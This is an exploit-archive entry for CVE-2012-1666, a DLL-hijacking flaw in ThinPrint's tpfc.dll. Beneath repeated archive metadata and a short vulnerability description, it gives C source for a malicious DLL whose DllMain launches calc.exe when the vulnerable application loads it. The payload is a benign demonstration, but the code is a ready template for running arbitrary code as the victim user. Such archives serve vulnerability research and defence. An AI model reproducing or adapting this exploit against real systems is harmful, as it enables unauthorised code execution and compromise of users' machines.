ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution
| EKU-ID: 42210 | CVE: CVE-2012-1666;OSVDB-85477 | OSVDB-ID: |
| Author: Moshe Zioni | Published: 2012-09-04 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 42210 | CVE: CVE-2012-1666;OSVDB-85477 | OSVDB-ID: |
| Author: Moshe Zioni | Published: 2012-09-04 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
// source: https://www.securityfocus.com/bid/55421/info
ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.
Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application.
#include <windows.h>
int hijack_poc ()
{
WinExec ( "calc.exe" , SW_NORMAL );
return 0 ;
}
BOOL WINAPI DllMain
( HINSTANCE hinstDLL ,
DWORD dwReason ,
LPVOID lpvReserved )
{
hijack_poc () ;
return 0 ;
}